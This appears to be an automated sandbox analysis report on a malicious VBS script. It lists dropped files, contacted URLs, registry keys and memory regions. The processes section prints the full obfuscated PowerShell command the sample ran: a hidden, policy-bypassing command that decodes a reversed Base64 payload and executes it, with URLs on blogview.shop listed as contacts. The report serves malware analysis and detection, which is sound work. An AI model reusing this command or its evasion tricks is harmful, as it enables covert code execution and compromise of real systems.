Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
rEco2oV1Uy.vbs
|
ASCII text, with very long lines (1397)
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_crxz5qkc.xqv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t22jw1ac.upz.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rEco2oV1Uy.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code =
'==Qf7kSewJHZkwyJ0g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8CNoNXZyZWZy9CM3gzM5UzM1EzN5UzN5AzN2IjN08yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c'
;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64))
;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://blogview.shop/api/values/46267097597153593870/refresh4/X
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://blogview.shop/api/values/
|
unknown
|
||
|
https://blogview.shop/api/values/46267097597153593870/refresh4/1804623795.txt
|
unknown
|
||
|
https://blogview.shop/api/values/refresh4
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://blogview.shop
|
unknown
|
||
|
https://blogview.shop/api/values/46267097597153593870/refresh4/
|
unknown
|
||
|
https://blogview.shop/api/values/refresh4X
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
blogview.shop
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
14D43F8E000
|
trusted library allocation
|
page read and write
|
|
|
|
14D5C4D2000
|
heap
|
page read and write
|
||
|
14D5C4BD000
|
heap
|
page read and write
|
||
|
7FFB4B030000
|
trusted library allocation
|
page read and write
|
||
|
22052B50000
|
heap
|
page read and write
|
||
|
22052BA1000
|
heap
|
page read and write
|
||
|
14D42270000
|
heap
|
page read and write
|
||
|
14D5C4D8000
|
heap
|
page read and write
|
||
|
14D5BD64000
|
heap
|
page read and write
|
||
|
14D44C9F000
|
trusted library allocation
|
page read and write
|
||
|
14AEBFE000
|
stack
|
page read and write
|
||
|
14D43CB0000
|
heap
|
page read and write
|
||
|
22052BFD000
|
heap
|
page read and write
|
||
|
14D4429A000
|
trusted library allocation
|
page read and write
|
||
|
14D45772000
|
trusted library allocation
|
page read and write
|
||
|
14D53D61000
|
trusted library allocation
|
page read and write
|
||
|
14AEAFD000
|
stack
|
page read and write
|
||
|
14AECFE000
|
stack
|
page read and write
|
||
|
7FFB4B250000
|
trusted library allocation
|
page read and write
|
||
|
14D458C8000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B06C000
|
trusted library allocation
|
page execute and read and write
|
||
|
14D42346000
|
heap
|
page read and write
|
||
|
14D42309000
|
heap
|
page read and write
|
||
|
E539BFF000
|
stack
|
page read and write
|
||
|
14D43D40000
|
heap
|
page read and write
|
||
|
E5392FA000
|
stack
|
page read and write
|
||
|
14D43D56000
|
heap
|
page read and write
|
||
|
14D5C4F0000
|
heap
|
page read and write
|
||
|
7FFB4B260000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B020000
|
trusted library allocation
|
page read and write
|
||
|
14D44190000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B330000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
E5393FE000
|
stack
|
page read and write
|
||
|
E5399FD000
|
stack
|
page read and write
|
||
|
22054A70000
|
heap
|
page read and write
|
||
|
7FFB4B0F6000
|
trusted library allocation
|
page execute and read and write
|
||
|
14D4576C000
|
trusted library allocation
|
page read and write
|
||
|
14D42210000
|
heap
|
page read and write
|
||
|
7FFB4B1E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22052B86000
|
heap
|
page read and write
|
||
|
7FFB4B380000
|
trusted library allocation
|
page read and write
|
||
|
14AFC4E000
|
stack
|
page read and write
|
||
|
7FFB4B220000
|
trusted library allocation
|
page read and write
|
||
|
14AF1FE000
|
stack
|
page read and write
|
||
|
14AEA73000
|
stack
|
page read and write
|
||
|
14D5C1B6000
|
heap
|
page read and write
|
||
|
22052D20000
|
heap
|
page read and write
|
||
|
14D441D5000
|
trusted library allocation
|
page read and write
|
||
|
22052BA2000
|
heap
|
page read and write
|
||
|
14D5C4CE000
|
heap
|
page read and write
|
||
|
14AEF7E000
|
stack
|
page read and write
|
||
|
14D457A6000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B130000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B210000
|
trusted library allocation
|
page read and write
|
||
|
14D43DE5000
|
trusted library allocation
|
page read and write
|
||
|
22054720000
|
heap
|
page read and write
|
||
|
7FFB4B370000
|
trusted library allocation
|
page read and write
|
||
|
14D423B3000
|
heap
|
page read and write
|
||
|
14AF0FE000
|
stack
|
page read and write
|
||
|
E5396FF000
|
stack
|
page read and write
|
||
|
14D42400000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B013000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B1B0000
|
trusted library allocation
|
page read and write
|
||
|
22052B9F000
|
heap
|
page read and write
|
||
|
7FFB4B2F0000
|
trusted library allocation
|
page read and write
|
||
|
14D5C380000
|
heap
|
page read and write
|
||
|
14D422C9000
|
heap
|
page read and write
|
||
|
7FFB4B230000
|
trusted library allocation
|
page read and write
|
||
|
7DF40D5B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22052B30000
|
heap
|
page read and write
|
||
|
14D422D3000
|
heap
|
page read and write
|
||
|
14D43D50000
|
heap
|
page read and write
|
||
|
14AF07E000
|
stack
|
page read and write
|
||
|
7FFB4B300000
|
trusted library allocation
|
page read and write
|
||
|
14D53D70000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B310000
|
trusted library allocation
|
page read and write
|
||
|
22052F15000
|
heap
|
page read and write
|
||
|
14AEDFE000
|
stack
|
page read and write
|
||
|
14D4429F000
|
trusted library allocation
|
page read and write
|
||
|
14D5C350000
|
heap
|
page execute and read and write
|
||
|
E539CFB000
|
stack
|
page read and write
|
||
|
14D53F10000
|
trusted library allocation
|
page read and write
|
||
|
14D5C21A000
|
heap
|
page read and write
|
||
|
7FFB4B340000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B014000
|
trusted library allocation
|
page read and write
|
||
|
14D5C4ED000
|
heap
|
page read and write
|
||
|
14D423F0000
|
heap
|
page readonly
|
||
|
14D42301000
|
heap
|
page read and write
|
||
|
14D5C28E000
|
heap
|
page read and write
|
||
|
22052BA4000
|
heap
|
page read and write
|
||
|
14D42450000
|
heap
|
page read and write
|
||
|
7FFB4B270000
|
trusted library allocation
|
page read and write
|
||
|
14AEFFD000
|
stack
|
page read and write
|
||
|
22052B57000
|
heap
|
page read and write
|
||
|
14D5C1B0000
|
heap
|
page read and write
|
||
|
14D5C205000
|
heap
|
page read and write
|
||
|
22052BA0000
|
heap
|
page read and write
|
||
|
14D5C26C000
|
heap
|
page read and write
|
||
|
7FFB4B1F2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2E0000
|
trusted library allocation
|
page read and write
|
||
|
14AEC7C000
|
stack
|
page read and write
|
||
|
7FFB4B0CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
22052BC5000
|
heap
|
page read and write
|
||
|
7FFB4B1CA000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
14D422C0000
|
heap
|
page read and write
|
||
|
7FFB4B360000
|
trusted library allocation
|
page read and write
|
||
|
14D43D61000
|
trusted library allocation
|
page read and write
|
||
|
14AEE7E000
|
stack
|
page read and write
|
||
|
14D4234D000
|
heap
|
page read and write
|
||
|
14D5C29B000
|
heap
|
page read and write
|
||
|
14D42303000
|
heap
|
page read and write
|
||
|
14D5C212000
|
heap
|
page read and write
|
||
|
E5394FE000
|
stack
|
page read and write
|
||
|
14D43C30000
|
trusted library allocation
|
page read and write
|
||
|
14AED7E000
|
stack
|
page read and write
|
||
|
14D422B0000
|
trusted library allocation
|
page read and write
|
||
|
22052BFC000
|
heap
|
page read and write
|
||
|
14AEB7E000
|
stack
|
page read and write
|
||
|
7FFB4B2B0000
|
trusted library allocation
|
page read and write
|
||
|
14AE7FE000
|
stack
|
page read and write
|
||
|
7FFB4B320000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0C6000
|
trusted library allocation
|
page read and write
|
||
|
14D42455000
|
heap
|
page read and write
|
||
|
7FFB4B200000
|
trusted library allocation
|
page execute and read and write
|
||
|
22052B86000
|
heap
|
page read and write
|
||
|
7FFB4B2A0000
|
trusted library allocation
|
page read and write
|
||
|
22052BA7000
|
heap
|
page read and write
|
||
|
7FFB4B0C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B02B000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B350000
|
trusted library allocation
|
page read and write
|
||
|
14D423E0000
|
heap
|
page execute and read and write
|
||
|
14D5C357000
|
heap
|
page execute and read and write
|
||
|
14D4231F000
|
heap
|
page read and write
|
||
|
7FFB4B290000
|
trusted library allocation
|
page read and write
|
||
|
14D42230000
|
heap
|
page read and write
|
||
|
E5397FE000
|
stack
|
page read and write
|
||
|
14D423D0000
|
trusted library allocation
|
page read and write
|
||
|
14D43D10000
|
heap
|
page execute and read and write
|
||
|
14D53DCD000
|
trusted library allocation
|
page read and write
|
||
|
14D42130000
|
heap
|
page read and write
|
||
|
14AF17E000
|
stack
|
page read and write
|
||
|
14D422FE000
|
heap
|
page read and write
|
||
|
7FFB4B012000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B280000
|
trusted library allocation
|
page read and write
|
||
|
14D43C00000
|
trusted library allocation
|
page read and write
|
||
|
14D45928000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B240000
|
trusted library allocation
|
page read and write
|
||
|
14AF27B000
|
stack
|
page read and write
|
||
|
14AEEFF000
|
stack
|
page read and write
|
||
|
14D5C460000
|
heap
|
page read and write
|
||
|
22052B20000
|
heap
|
page read and write
|
||
|
14D54047000
|
trusted library allocation
|
page read and write
|
||
|
22052BC5000
|
heap
|
page read and write
|
||
|
14D4569F000
|
trusted library allocation
|
page read and write
|
||
|
22052F10000
|
heap
|
page read and write
|
||
|
E539AFE000
|
stack
|
page read and write
|
||
|
7FFB4B01D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B2D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1C1000
|
trusted library allocation
|
page read and write
|
||
|
22052B7F000
|
heap
|
page read and write
|
There are 153 hidden memdumps, click here to show them.